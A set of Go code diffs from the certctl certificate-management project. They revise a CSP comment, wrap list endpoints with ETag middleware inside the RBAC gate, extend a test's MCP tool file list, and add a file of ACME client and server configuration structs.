||||||
@@ -32,9 +32,35 @@ type SecurityHeadersConfig struct {
|
|||||||
// CSP: default-src 'self' confines fetches to the same origin.
|
// CSP: default-src 'self' confines fetches to the same origin.
|
||||||
// img-src 'self' data: allows inline base64 images (used by the
|
// img-src 'self' data: allows inline base64 images (used by the
|
||||||
// dashboard's certctl-logo and a few status icons).
|
// dashboard's certctl-logo and a few status icons).
|
||||||
// style-src 'self' 'unsafe-inline' is required because Tailwind
|
// style-src 'self' 'unsafe-inline' — the 'unsafe-inline' grant
|
||||||
// (via Vite) injects per-component <style> blocks at build time;
|
// is required by React's inline `style={...}` attribute model,
|
||||||
// without 'unsafe-inline' the dashboard would render unstyled.
|
// which emits HTML `style="..."` attributes that the browser
|
||||||
|
// treats as inline styles for CSP purposes. The dashboard has 5
|
||||||
|
// load-bearing dynamic-style sites: Tooltip's Floating-UI
|
||||||
|
// position (left/top px values computed per-tick),
|
||||||
|
// AgentFleetPage's dynamic color+width chart bars,
|
||||||
|
// dashboard/charts.tsx Recharts color props, CertificatesPage's
|
||||||
|
// progress-bar percent width, IssuerHierarchyPage's depth-based
|
||||||
|
// marginLeft. The static-pixel uses (UsersPage filter + table UI,
|
||||||
|
// DigestPage iframe min-height, AuthProvider demo-mode banner)
|
||||||
|
// were migrated to Tailwind utility classes via FE-M6 closure
|
||||||
|
// 2026-05-14.
|
||||||
|
//
|
||||||
|
// FE-M6 audit-framing correction: this comment USED TO say
|
||||||
|
// "Tailwind (via Vite) injects per-component <style> blocks at
|
||||||
|
// build time." That was factually wrong. Vite's CSS output is a
|
||||||
|
// single .css file linked via <link rel="stylesheet"> — verified
|
||||||
|
// against dist/index.html post-build: zero <style> tags emitted.
|
||||||
|
// The 'unsafe-inline' grant exists for React's style-attribute
|
||||||
|
// output path, not for Vite or Tailwind.
|
||||||
|
//
|
||||||
|
// Fully eliminating 'unsafe-inline' would require either banning
|
||||||
|
// dynamic `style={...}` (rewriting the 5 load-bearing sites with
|
||||||
|
// a CSS-in-JS library that emits hashed/nonce'd <style> blocks)
|
||||||
|
// or adopting CSP nonces with React 18+'s style runtime. Neither
|
||||||
|
// fits the original FE-M6 phase budget; tracked as a future
|
||||||
|
// security-hardening item.
|
||||||
|
//
|
||||||
// 'unsafe-inline' is intentionally NOT in script-src — the
|
// 'unsafe-inline' is intentionally NOT in script-src — the
|
||||||
// front-end ships as a bundled JS file, no inline scripts.
|
// front-end ships as a bundled JS file, no inline scripts.
|
||||||
//
|
//
|
||||||
|
|||||||
@@ -11,6 +11,43 @@ import (
|
|||||||
"github.com/certctl-io/certctl/internal/auth"
|
"github.com/certctl-io/certctl/internal/auth"
|
||||||
)
|
)
|
||||||
|
|
||||||
|
// etaggedFunc wraps a list-endpoint handler with the SCALE-L2 ETag
|
||||||
|
// middleware. Phase 6 SCALE-L2 closure (2026-05-14): the top-5
|
||||||
|
// read-heavy list endpoints (/certificates, /jobs, /agents,
|
||||||
|
// /audit, /discovered-certificates) get ETag + If-None-Match
|
||||||
|
// short-circuit to avoid re-running their SELECT COUNT(*) +
|
||||||
|
// row-marshaling pass on every dashboard poll.
|
||||||
|
//
|
||||||
|
// Call-site shape (rbacGate is OUTER, etaggedFunc is INNER):
|
||||||
|
//
|
||||||
|
// r.Register(route, rbacGate(checker, "perm", etaggedFunc(handler)))
|
||||||
|
//
|
||||||
|
// Wrap order at request time:
|
||||||
|
//
|
||||||
|
// request → rbacGate → etaggedFunc → handler
|
||||||
|
//
|
||||||
|
// Auth runs FIRST. Unauthenticated requests bounce at HTTP 403
|
||||||
|
// before the response-buffering ETag middleware ever runs, so the
|
||||||
|
// SHA-256-over-body cost only applies to authenticated 2xx
|
||||||
|
// responses. This shape is also what TestRouterRBACGateCoverage
|
||||||
|
// asserts (the AST CI guard introduced for 2026-05-10 audit CRIT-1
|
||||||
|
// requires rbacGate / rbacGateScoped to be the OUTER wrap on every
|
||||||
|
// state-changing or read endpoint).
|
||||||
|
//
|
||||||
|
// Phase 6's initial commit shipped the OPPOSITE order
|
||||||
|
// (etagged(rbacGate(handler))) — functionally safe because the ETag
|
||||||
|
// middleware emits ETag only on 2xx responses, but it failed the
|
||||||
|
// AST coverage test. Phase 8 hotfix (commit see git log --grep=U1000
|
||||||
|
// follow-on) inverted the wrap so rbacGate is the outer call.
|
||||||
|
//
|
||||||
|
// The signature is http.HandlerFunc → http.HandlerFunc (not the
|
||||||
|
// http.Handler form) because rbacGate expects http.HandlerFunc as
|
||||||
|
// its third arg; nesting an http.Handler-returning helper inside it
|
||||||
|
// would type-fail.
|
||||||
|
func etaggedFunc(h http.HandlerFunc) http.HandlerFunc {
|
||||||
|
return middleware.ETag(h).ServeHTTP
|
||||||
|
}
|
||||||
|
|
||||||
// rbacGate wraps a handler with auth.RequirePermission(checker, perm,
|
// rbacGate wraps a handler with auth.RequirePermission(checker, perm,
|
||||||
// nil) — i.e. a GLOBAL-SCOPE permission check. Used by RegisterHandlers
|
// nil) — i.e. a GLOBAL-SCOPE permission check. Used by RegisterHandlers
|
||||||
// to gate every state-changing + read endpoint. When checker is nil the
|
// to gate every state-changing + read endpoint. When checker is nil the
|
||||||
@@ -567,7 +604,7 @@ func (r *Router) RegisterHandlers(reg HandlerRegistry) {
|
|||||||
r.Register("POST /api/v1/est/certificates/bulk-revoke", rbacGate(reg.Checker, "cert.bulk_revoke", reg.BulkRevocation.BulkRevokeEST))
|
r.Register("POST /api/v1/est/certificates/bulk-revoke", rbacGate(reg.Checker, "cert.bulk_revoke", reg.BulkRevocation.BulkRevokeEST))
|
||||||
r.Register("POST /api/v1/certificates/bulk-renew", rbacGate(reg.Checker, "cert.issue", reg.BulkRenewal.BulkRenew))
|
r.Register("POST /api/v1/certificates/bulk-renew", rbacGate(reg.Checker, "cert.issue", reg.BulkRenewal.BulkRenew))
|
||||||
r.Register("POST /api/v1/certificates/bulk-reassign", rbacGate(reg.Checker, "cert.edit", reg.BulkReassignment.BulkReassign))
|
r.Register("POST /api/v1/certificates/bulk-reassign", rbacGate(reg.Checker, "cert.edit", reg.BulkReassignment.BulkReassign))
|
||||||
r.Register("GET /api/v1/certificates", rbacGate(reg.Checker, "cert.read", reg.Certificates.ListCertificates))
|
r.Register("GET /api/v1/certificates", rbacGate(reg.Checker, "cert.read", etaggedFunc(reg.Certificates.ListCertificates)))
|
||||||
r.Register("POST /api/v1/certificates", rbacGate(reg.Checker, "cert.issue", reg.Certificates.CreateCertificate))
|
r.Register("POST /api/v1/certificates", rbacGate(reg.Checker, "cert.issue", reg.Certificates.CreateCertificate))
|
||||||
r.Register("GET /api/v1/certificates/{id}", rbacGate(reg.Checker, "cert.read", reg.Certificates.GetCertificate))
|
r.Register("GET /api/v1/certificates/{id}", rbacGate(reg.Checker, "cert.read", reg.Certificates.GetCertificate))
|
||||||
r.Register("PUT /api/v1/certificates/{id}", rbacGate(reg.Checker, "cert.edit", reg.Certificates.UpdateCertificate))
|
r.Register("PUT /api/v1/certificates/{id}", rbacGate(reg.Checker, "cert.edit", reg.Certificates.UpdateCertificate))
|
||||||
@@ -619,7 +656,7 @@ func (r *Router) RegisterHandlers(reg HandlerRegistry) {
|
|||||||
// * DELETE /api/v1/agents/{id} — RetireAgent. Replaces the pre-I-004
|
// * DELETE /api/v1/agents/{id} — RetireAgent. Replaces the pre-I-004
|
||||||
// hard-delete; the underlying repo does a soft-retire with
|
// hard-delete; the underlying repo does a soft-retire with
|
||||||
// optional cascade.
|
// optional cascade.
|
||||||
r.Register("GET /api/v1/agents", rbacGate(reg.Checker, "agent.read", reg.Agents.ListAgents))
|
r.Register("GET /api/v1/agents", rbacGate(reg.Checker, "agent.read", etaggedFunc(reg.Agents.ListAgents)))
|
||||||
r.Register("POST /api/v1/agents", rbacGate(reg.Checker, "agent.edit", reg.Agents.RegisterAgent))
|
r.Register("POST /api/v1/agents", rbacGate(reg.Checker, "agent.edit", reg.Agents.RegisterAgent))
|
||||||
r.Register("GET /api/v1/agents/retired", rbacGate(reg.Checker, "agent.read", reg.Agents.ListRetiredAgents))
|
r.Register("GET /api/v1/agents/retired", rbacGate(reg.Checker, "agent.read", reg.Agents.ListRetiredAgents))
|
||||||
r.Register("GET /api/v1/agents/{id}", rbacGate(reg.Checker, "agent.read", reg.Agents.GetAgent))
|
r.Register("GET /api/v1/agents/{id}", rbacGate(reg.Checker, "agent.read", reg.Agents.GetAgent))
|
||||||
@@ -631,7 +668,7 @@ func (r *Router) RegisterHandlers(reg HandlerRegistry) {
|
|||||||
r.Register("POST /api/v1/agents/{id}/jobs/{job_id}/status", rbacGate(reg.Checker, "agent.job.complete", reg.Agents.AgentReportJobStatus))
|
r.Register("POST /api/v1/agents/{id}/jobs/{job_id}/status", rbacGate(reg.Checker, "agent.job.complete", reg.Agents.AgentReportJobStatus))
|
||||||
|
|
||||||
// Jobs routes: /api/v1/jobs
|
// Jobs routes: /api/v1/jobs
|
||||||
r.Register("GET /api/v1/jobs", rbacGate(reg.Checker, "job.read", reg.Jobs.ListJobs))
|
r.Register("GET /api/v1/jobs", rbacGate(reg.Checker, "job.read", etaggedFunc(reg.Jobs.ListJobs)))
|
||||||
r.Register("GET /api/v1/jobs/{id}", rbacGate(reg.Checker, "job.read", reg.Jobs.GetJob))
|
r.Register("GET /api/v1/jobs/{id}", rbacGate(reg.Checker, "job.read", reg.Jobs.GetJob))
|
||||||
r.Register("POST /api/v1/jobs/{id}/cancel", rbacGate(reg.Checker, "job.cancel", reg.Jobs.CancelJob))
|
r.Register("POST /api/v1/jobs/{id}/cancel", rbacGate(reg.Checker, "job.cancel", reg.Jobs.CancelJob))
|
||||||
r.Register("POST /api/v1/jobs/{id}/approve", rbacGate(reg.Checker, "approval.approve", reg.Jobs.ApproveJob))
|
r.Register("POST /api/v1/jobs/{id}/approve", rbacGate(reg.Checker, "approval.approve", reg.Jobs.ApproveJob))
|
||||||
@@ -695,7 +732,7 @@ func (r *Router) RegisterHandlers(reg HandlerRegistry) {
|
|||||||
r.Register("GET /api/v1/agent-groups/{id}/members", rbacGate(reg.Checker, "agent.read", reg.AgentGroups.ListAgentGroupMembers))
|
r.Register("GET /api/v1/agent-groups/{id}/members", rbacGate(reg.Checker, "agent.read", reg.AgentGroups.ListAgentGroupMembers))
|
||||||
|
|
||||||
// Audit routes: /api/v1/audit
|
// Audit routes: /api/v1/audit
|
||||||
r.Register("GET /api/v1/audit", rbacGate(reg.Checker, "audit.read", reg.Audit.ListAuditEvents))
|
r.Register("GET /api/v1/audit", rbacGate(reg.Checker, "audit.read", etaggedFunc(reg.Audit.ListAuditEvents)))
|
||||||
// Audit 2026-05-10 HIGH-11 closure — `audit.export` permission was
|
// Audit 2026-05-10 HIGH-11 closure — `audit.export` permission was
|
||||||
// already seeded into r-admin + r-auditor (migration 000031), but
|
// already seeded into r-admin + r-auditor (migration 000031), but
|
||||||
// no endpoint enforced it pre-fix; r-auditor's claim was misleading
|
// no endpoint enforced it pre-fix; r-auditor's claim was misleading
|
||||||
@@ -765,7 +802,7 @@ func (r *Router) RegisterHandlers(reg HandlerRegistry) {
|
|||||||
|
|
||||||
// Discovery routes: /api/v1/discovered-certificates, /api/v1/discovery-scans
|
// Discovery routes: /api/v1/discovered-certificates, /api/v1/discovery-scans
|
||||||
r.Register("POST /api/v1/agents/{id}/discoveries", rbacGate(reg.Checker, "discovery.run", reg.Discovery.SubmitDiscoveryReport))
|
r.Register("POST /api/v1/agents/{id}/discoveries", rbacGate(reg.Checker, "discovery.run", reg.Discovery.SubmitDiscoveryReport))
|
||||||
r.Register("GET /api/v1/discovered-certificates", rbacGate(reg.Checker, "discovery.read", reg.Discovery.ListDiscovered))
|
r.Register("GET /api/v1/discovered-certificates", rbacGate(reg.Checker, "discovery.read", etaggedFunc(reg.Discovery.ListDiscovered)))
|
||||||
r.Register("GET /api/v1/discovered-certificates/{id}", rbacGate(reg.Checker, "discovery.read", reg.Discovery.GetDiscovered))
|
r.Register("GET /api/v1/discovered-certificates/{id}", rbacGate(reg.Checker, "discovery.read", reg.Discovery.GetDiscovered))
|
||||||
r.Register("POST /api/v1/discovered-certificates/{id}/claim", rbacGate(reg.Checker, "discovery.claim", reg.Discovery.ClaimDiscovered))
|
r.Register("POST /api/v1/discovered-certificates/{id}/claim", rbacGate(reg.Checker, "discovery.claim", reg.Discovery.ClaimDiscovered))
|
||||||
r.Register("POST /api/v1/discovered-certificates/{id}/dismiss", rbacGate(reg.Checker, "discovery.claim", reg.Discovery.DismissDiscovered))
|
r.Register("POST /api/v1/discovered-certificates/{id}/dismiss", rbacGate(reg.Checker, "discovery.claim", reg.Discovery.DismissDiscovered))
|
||||||
|
|||||||
@@ -64,14 +64,30 @@ var (
|
|||||||
|
|
||||||
// mcpToolFiles lists the (non-test) Go files expected to register
|
// mcpToolFiles lists the (non-test) Go files expected to register
|
||||||
// MCP tools.
|
// MCP tools.
|
||||||
|
//
|
||||||
|
// Phase 9 Sprint 10 (commit fbe053aa, 2026-05-14): tools.go was split
|
||||||
|
// into six tool-domain sibling files in the same `mcp` package
|
||||||
|
// (tools_certificates.go + tools_agents.go + tools_resources.go +
|
||||||
|
// tools_jobs.go + tools_discovery.go + tools_admin.go). Original
|
||||||
|
// tools.go now holds only the RegisterTools dispatcher + Bundle-3
|
||||||
|
// fence wrappers + paginationQuery helper — zero mcp.AddTool calls.
|
||||||
|
// This list is the union of pre-Sprint-10 + Sprint-10 sibling files.
|
||||||
func mcpToolFiles(repo string) []string {
|
func mcpToolFiles(repo string) []string {
|
||||||
base := filepath.Join(repo, "internal", "mcp")
|
base := filepath.Join(repo, "internal", "mcp")
|
||||||
return []string{
|
return []string{
|
||||||
|
// Pre-Sprint-10 catalogue.
|
||||||
filepath.Join(base, "tools.go"),
|
filepath.Join(base, "tools.go"),
|
||||||
filepath.Join(base, "tools_audit_fix.go"),
|
filepath.Join(base, "tools_audit_fix.go"),
|
||||||
filepath.Join(base, "tools_auth.go"),
|
filepath.Join(base, "tools_auth.go"),
|
||||||
filepath.Join(base, "tools_auth_bundle2.go"),
|
filepath.Join(base, "tools_auth_bundle2.go"),
|
||||||
filepath.Join(base, "tools_est.go"),
|
filepath.Join(base, "tools_est.go"),
|
||||||
|
// Phase 9 Sprint 10 sibling files.
|
||||||
|
filepath.Join(base, "tools_certificates.go"),
|
||||||
|
filepath.Join(base, "tools_agents.go"),
|
||||||
|
filepath.Join(base, "tools_resources.go"),
|
||||||
|
filepath.Join(base, "tools_jobs.go"),
|
||||||
|
filepath.Join(base, "tools_discovery.go"),
|
||||||
|
filepath.Join(base, "tools_admin.go"),
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|||||||
@@ -0,0 +1,262 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package config
|
||||||
|
|
||||||
|
import "time"
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure Sprint 2 (2026-05-14): extracted from
|
||||||
|
// config.go to reduce its change-risk hotspot footprint. Three
|
||||||
|
// related types live here:
|
||||||
|
//
|
||||||
|
// ACMEConfig — the issuer-connector (consumer) side:
|
||||||
|
// we are a CLIENT talking UP to an ACME
|
||||||
|
// CA (Let's Encrypt, pebble, step-ca).
|
||||||
|
// CERTCTL_ACME_* prefix.
|
||||||
|
// ACMEServerConfig — the server-side ACME (RFC 8555 + RFC
|
||||||
|
// 9773) configuration: we ARE the ACME
|
||||||
|
// server, exposing /acme/profile/<id>/*
|
||||||
|
// to cert-manager / lego / acme.sh
|
||||||
|
// clients. CERTCTL_ACME_SERVER_* prefix
|
||||||
|
// (deliberately distinct from the
|
||||||
|
// consumer namespace).
|
||||||
|
// ACMEServerDirectoryMeta — the optional `meta` block of the ACME
|
||||||
|
// directory document, populated from
|
||||||
|
// CERTCTL_ACME_SERVER_TOS_URL / WEBSITE
|
||||||
|
// / CAA_IDENTITIES / EAB_REQUIRED.
|
||||||
|
//
|
||||||
|
// Every field, doc-comment, and exported name is byte-identical to
|
||||||
|
// the pre-split form. The structs live in the same `config` package
|
||||||
|
// so every caller's `config.ACMEConfig` etc. import path is
|
||||||
|
// preserved without modification.
|
||||||
|
//
|
||||||
|
// Public-surface invariant: `go doc internal/config ACMEConfig` and
|
||||||
|
// `go doc internal/config ACMEServerConfig` produce identical output
|
||||||
|
// before and after this split.
|
||||||
|
|
||||||
|
// ACMEConfig contains ACME issuer connector configuration.
|
||||||
|
type ACMEConfig struct {
|
||||||
|
// DirectoryURL is the ACME directory URL for certificate issuance.
|
||||||
|
// Examples: "https://acme-v02.api.letsencrypt.org/directory" (Let's Encrypt),
|
||||||
|
// "https://acme.zerossl.com/v2/DV90" (ZeroSSL), or custom CA directory.
|
||||||
|
DirectoryURL string
|
||||||
|
|
||||||
|
// Email is the email address for ACME account registration.
|
||||||
|
// Used for certificate expiration notices and account recovery by ACME CA.
|
||||||
|
Email string
|
||||||
|
|
||||||
|
// ChallengeType selects the ACME challenge mechanism for domain validation.
|
||||||
|
// Valid values: "http-01" (default, requires public HTTP endpoint),
|
||||||
|
// "dns-01" (DNS TXT record per renewal), or "dns-persist-01" (standing DNS record).
|
||||||
|
// Default: "http-01".
|
||||||
|
ChallengeType string
|
||||||
|
|
||||||
|
// DNSPresentScript is the path to a shell script that creates DNS TXT records.
|
||||||
|
// Required for dns-01 and dns-persist-01 challenge types.
|
||||||
|
// Script receives these environment variables:
|
||||||
|
// - CERTCTL_DNS_DOMAIN: domain being validated (e.g., "example.com")
|
||||||
|
// - CERTCTL_DNS_FQDN: full record name (e.g., "_acme-challenge.example.com" or "_validation-persist.example.com")
|
||||||
|
// - CERTCTL_DNS_VALUE: TXT record value (key authorization digest for dns-01, or issuer domain info for dns-persist-01)
|
||||||
|
// - CERTCTL_DNS_TOKEN: ACME challenge token
|
||||||
|
// Example: /opt/dns-scripts/add-record.sh
|
||||||
|
DNSPresentScript string
|
||||||
|
|
||||||
|
// DNSCleanUpScript is the path to a shell script that removes DNS TXT records.
|
||||||
|
// Used only for dns-01 challenges to clean up temporary validation records.
|
||||||
|
// Script receives the same environment variables as DNSPresentScript.
|
||||||
|
// Leave empty if cleanup is not needed (e.g., dns-persist-01).
|
||||||
|
DNSCleanUpScript string
|
||||||
|
|
||||||
|
// DNSPersistIssuerDomain is the issuer domain for dns-persist-01 standing records.
|
||||||
|
// Example: "letsencrypt.org" or "zerossl.com". Only used if ChallengeType is "dns-persist-01".
|
||||||
|
// The record value becomes: "<issuer_domain>; accounturi=<acme_account_uri>"
|
||||||
|
DNSPersistIssuerDomain string
|
||||||
|
|
||||||
|
// Profile selects the ACME certificate profile for newOrder requests.
|
||||||
|
// Let's Encrypt supports "tlsserver" (standard TLS) and "shortlived" (6-day certs).
|
||||||
|
// Leave empty for the CA's default profile (backward-compatible).
|
||||||
|
// Setting: CERTCTL_ACME_PROFILE environment variable.
|
||||||
|
Profile string
|
||||||
|
|
||||||
|
// ARIEnabled enables ACME Renewal Information (RFC 9773) support.
|
||||||
|
// When enabled, the renewal scheduler queries the CA for suggested renewal windows
|
||||||
|
// instead of relying solely on static expiration thresholds.
|
||||||
|
// Default: false. Requires a CA that supports ARI (e.g., Let's Encrypt).
|
||||||
|
// Setting: CERTCTL_ACME_ARI_ENABLED environment variable.
|
||||||
|
ARIEnabled bool
|
||||||
|
|
||||||
|
// Insecure skips TLS certificate verification when connecting to the ACME directory.
|
||||||
|
// Only use for testing with self-signed ACME servers like Pebble. Never in production.
|
||||||
|
// Setting: CERTCTL_ACME_INSECURE environment variable.
|
||||||
|
Insecure bool
|
||||||
|
|
||||||
|
// InsecureAck is the Phase 2 SEC-M4 closure (2026-05-13): when
|
||||||
|
// Insecure=true, Validate() refuses to start unless InsecureAck is
|
||||||
|
// also true. Pre-Phase-2 the Insecure flag only emitted a boot-time
|
||||||
|
// WARN log; this guard converts that to a hard fail-closed gate so
|
||||||
|
// the dev-only escape hatch cannot be flipped accidentally in
|
||||||
|
// production via a copy-pasted Pebble runbook.
|
||||||
|
//
|
||||||
|
// Acknowledged (Insecure=true + InsecureAck=true): boot proceeds + WARN logs.
|
||||||
|
// Unack'd (Insecure=true + InsecureAck=false): ErrACMEInsecureWithoutAck.
|
||||||
|
// Off (Insecure=false): InsecureAck is ignored entirely.
|
||||||
|
//
|
||||||
|
// Setting: CERTCTL_ACME_INSECURE_ACK environment variable.
|
||||||
|
InsecureAck bool
|
||||||
|
}
|
||||||
|
|
||||||
|
// ACMEServerConfig is the SERVER-side ACME (RFC 8555 + RFC 9773 ARI)
|
||||||
|
// configuration. Distinct from ACMEConfig (the consumer-side issuer
|
||||||
|
// connector that talks UP to Let's Encrypt / pebble). Server uses
|
||||||
|
// CERTCTL_ACME_SERVER_* prefix throughout to avoid colliding with
|
||||||
|
// the existing CERTCTL_ACME_* consumer namespace (DIRECTORY_URL /
|
||||||
|
// PROFILE / CHALLENGE_TYPE / etc.).
|
||||||
|
//
|
||||||
|
// Phase 1a wires Enabled / DefaultAuthMode / DefaultProfileID /
|
||||||
|
// NonceTTL / DirectoryMeta. Order/Authz TTLs + the per-challenge-type
|
||||||
|
// concurrency caps + DNS01 resolver are reserved fields populated for
|
||||||
|
// Phases 2/3 — exposing them now keeps the env-var surface stable
|
||||||
|
// from day one (operators can set CERTCTL_ACME_SERVER_HTTP01_CONCURRENCY
|
||||||
|
// today; it's a no-op until Phase 3 reads it).
|
||||||
|
type ACMEServerConfig struct {
|
||||||
|
// Enabled is the master toggle. When false, the ACME handler is
|
||||||
|
// constructed (so the registry-shape stays stable) but no routes
|
||||||
|
// are registered. Operators flip this on after configuring the
|
||||||
|
// per-profile auth_mode column on certificate_profiles.
|
||||||
|
// Setting: CERTCTL_ACME_SERVER_ENABLED.
|
||||||
|
Enabled bool
|
||||||
|
|
||||||
|
// DefaultAuthMode sets the default value of certificate_profiles.acme_auth_mode
|
||||||
|
// for NEWLY-created profiles (e.g. via API). Existing profile rows
|
||||||
|
// retain whatever value they were created with — per-profile
|
||||||
|
// values, once set, override this default. Architecture decision:
|
||||||
|
// auth mode is per-profile, not server-wide.
|
||||||
|
// Valid: "trust_authenticated" (default) or "challenge".
|
||||||
|
// Setting: CERTCTL_ACME_SERVER_DEFAULT_AUTH_MODE.
|
||||||
|
DefaultAuthMode string
|
||||||
|
|
||||||
|
// DefaultProfileID, when set, activates the /acme/* shorthand
|
||||||
|
// path family — /acme/directory mirrors
|
||||||
|
// /acme/profile/<DefaultProfileID>/directory etc. When empty,
|
||||||
|
// requests to the shorthand return RFC 7807
|
||||||
|
// userActionRequired with a hint pointing at the per-profile
|
||||||
|
// path. Single-profile deployments can set this for ergonomic
|
||||||
|
// client config; multi-profile deployments leave it empty.
|
||||||
|
// Setting: CERTCTL_ACME_SERVER_DEFAULT_PROFILE_ID.
|
||||||
|
DefaultProfileID string
|
||||||
|
|
||||||
|
// NonceTTL is how long an issued ACME nonce remains valid before
|
||||||
|
// the server rejects it as expired. RFC 8555 §6.5.1 allows the
|
||||||
|
// server to set any TTL; 5 minutes is the operator-friendly
|
||||||
|
// default (clock-skew tolerant without enabling long-replay
|
||||||
|
// attacks). Setting: CERTCTL_ACME_SERVER_NONCE_TTL.
|
||||||
|
NonceTTL time.Duration
|
||||||
|
|
||||||
|
// OrderTTL is the lifetime of an unfulfilled ACME order. Phase 2
|
||||||
|
// reads; Phase 1a reserves the field. Default: 24h.
|
||||||
|
// Setting: CERTCTL_ACME_SERVER_ORDER_TTL.
|
||||||
|
OrderTTL time.Duration
|
||||||
|
|
||||||
|
// AuthzTTL is the lifetime of an unfulfilled authorization. Phase 2
|
||||||
|
// reads; Phase 1a reserves. Default: 24h.
|
||||||
|
// Setting: CERTCTL_ACME_SERVER_AUTHZ_TTL.
|
||||||
|
AuthzTTL time.Duration
|
||||||
|
|
||||||
|
// HTTP01ConcurrencyMax is the bound on concurrent HTTP-01 validators
|
||||||
|
// (semaphore weight). Phase 3 reads; Phase 1a reserves. Default: 10.
|
||||||
|
// Setting: CERTCTL_ACME_SERVER_HTTP01_CONCURRENCY.
|
||||||
|
HTTP01ConcurrencyMax int
|
||||||
|
|
||||||
|
// DNS01Resolver is the resolver address used by the DNS-01 validator.
|
||||||
|
// Phase 3 reads; Phase 1a reserves. Default: "8.8.8.8:53".
|
||||||
|
// Setting: CERTCTL_ACME_SERVER_DNS01_RESOLVER.
|
||||||
|
DNS01Resolver string
|
||||||
|
|
||||||
|
// DNS01ConcurrencyMax bounds concurrent DNS-01 validators. Default: 10.
|
||||||
|
// Setting: CERTCTL_ACME_SERVER_DNS01_CONCURRENCY.
|
||||||
|
DNS01ConcurrencyMax int
|
||||||
|
|
||||||
|
// TLSALPN01ConcurrencyMax bounds concurrent TLS-ALPN-01 validators.
|
||||||
|
// Default: 10. Setting: CERTCTL_ACME_SERVER_TLSALPN01_CONCURRENCY.
|
||||||
|
TLSALPN01ConcurrencyMax int
|
||||||
|
|
||||||
|
// ARIEnabled toggles RFC 9773 ACME Renewal Information surface
|
||||||
|
// (the `renewalInfo` directory entry + GET
|
||||||
|
// /acme/profile/<id>/renewal-info/<cert-id>). Default: true.
|
||||||
|
// Operators wanting Phase-1a-style "directory + nonce + accounts +
|
||||||
|
// orders + finalize + challenges only" can flip this off; doing so
|
||||||
|
// drops the renewalInfo URL from the directory document so ACME
|
||||||
|
// clients fall back to their static renewal scheduler. Phase 4 wires.
|
||||||
|
// Setting: CERTCTL_ACME_SERVER_ARI_ENABLED.
|
||||||
|
ARIEnabled bool
|
||||||
|
|
||||||
|
// ARIPollInterval is the value the server returns in the Retry-After
|
||||||
|
// response header on a 200 ARI response — i.e., the suggested gap
|
||||||
|
// between successive ARI polls a client should respect. RFC 9773 §4.2
|
||||||
|
// leaves this server-policy. Default: 6h. Tighter intervals (e.g. 1h)
|
||||||
|
// suit short-lived certs; looser intervals (24h) suit standard 90-day
|
||||||
|
// certs. Setting: CERTCTL_ACME_SERVER_ARI_POLL_INTERVAL.
|
||||||
|
ARIPollInterval time.Duration
|
||||||
|
|
||||||
|
// RateLimitOrdersPerHour caps new-order requests per ACME account per
|
||||||
|
// rolling hour. 0 disables (no limit). Default: 100. Hits return RFC
|
||||||
|
// 7807 + RFC 8555 §6.7 `urn:ietf:params:acme:error:rateLimited` with
|
||||||
|
// a Retry-After header. In-memory token-bucket — restart wipes the
|
||||||
|
// counter, which is acceptable for orders/hour caps (eventual-
|
||||||
|
// consistency anyway). Setting:
|
||||||
|
// CERTCTL_ACME_SERVER_RATE_LIMIT_ORDERS_PER_HOUR.
|
||||||
|
RateLimitOrdersPerHour int
|
||||||
|
|
||||||
|
// RateLimitConcurrentOrders caps the number of orders an ACME account
|
||||||
|
// can have in pending/ready/processing state simultaneously. 0
|
||||||
|
// disables. Default: 5. Same Problem shape as the per-hour limit.
|
||||||
|
// Setting: CERTCTL_ACME_SERVER_RATE_LIMIT_CONCURRENT_ORDERS.
|
||||||
|
RateLimitConcurrentOrders int
|
||||||
|
|
||||||
|
// RateLimitKeyChangePerHour caps account-key rollovers per account
|
||||||
|
// per rolling hour. 0 disables. Default: 5 (rollovers should be rare;
|
||||||
|
// a flood is an attack signal). Setting:
|
||||||
|
// CERTCTL_ACME_SERVER_RATE_LIMIT_KEY_CHANGE_PER_HOUR.
|
||||||
|
RateLimitKeyChangePerHour int
|
||||||
|
|
||||||
|
// RateLimitChallengeRespondsPerHour caps challenge-respond requests
|
||||||
|
// per challenge per rolling hour. 0 disables. Default: 60 (defends
|
||||||
|
// against retry storms from a misbehaving client). Setting:
|
||||||
|
// CERTCTL_ACME_SERVER_RATE_LIMIT_CHALLENGE_RESPONDS_PER_HOUR.
|
||||||
|
RateLimitChallengeRespondsPerHour int
|
||||||
|
|
||||||
|
// GCInterval is the tick interval for the ACME GC scheduler loop.
|
||||||
|
// On each tick the loop sweeps expired nonces, transitions expired
|
||||||
|
// pending authzs to `expired`, transitions expired
|
||||||
|
// pending/ready/processing orders to `invalid`, and reaps Phase-2
|
||||||
|
// atomicity-window orphans (orders without a linked cert when one
|
||||||
|
// should exist). 0 disables the loop entirely. Default: 1m. Setting:
|
||||||
|
// CERTCTL_ACME_SERVER_GC_INTERVAL.
|
||||||
|
GCInterval time.Duration
|
||||||
|
|
||||||
|
// DirectoryMeta is the optional metadata advertised in the directory
|
||||||
|
// document per RFC 8555 §7.1.1.
|
||||||
|
DirectoryMeta ACMEServerDirectoryMeta
|
||||||
|
}
|
||||||
|
|
||||||
|
// ACMEServerDirectoryMeta holds the optional fields of the directory
|
||||||
|
// `meta` block. Each is populated from a CERTCTL_ACME_SERVER_*
|
||||||
|
// env var; an all-empty struct produces an omitempty-suppressed JSON
|
||||||
|
// `meta` field on the directory.
|
||||||
|
type ACMEServerDirectoryMeta struct {
|
||||||
|
// TermsOfService is a URL pointing to the operator's ToS document.
|
||||||
|
// Setting: CERTCTL_ACME_SERVER_TOS_URL.
|
||||||
|
TermsOfService string
|
||||||
|
// Website is a URL pointing to the operator's homepage.
|
||||||
|
// Setting: CERTCTL_ACME_SERVER_WEBSITE.
|
||||||
|
Website string
|
||||||
|
// CAAIdentities is the list of CAA-record domain values clients
|
||||||
|
// should authorize for this server. Setting:
|
||||||
|
// CERTCTL_ACME_SERVER_CAA_IDENTITIES (comma-separated).
|
||||||
|
CAAIdentities []string
|
||||||
|
// ExternalAccountRequired, when true, signals to clients that
|
||||||
|
// new-account requires an EAB token (RFC 8555 §7.3.4). Phase 1a
|
||||||
|
// advertises but does not enforce; EAB enforcement is a follow-up.
|
||||||
|
// Setting: CERTCTL_ACME_SERVER_EAB_REQUIRED.
|
||||||
|
ExternalAccountRequired bool
|
||||||
|
}
|
||||||
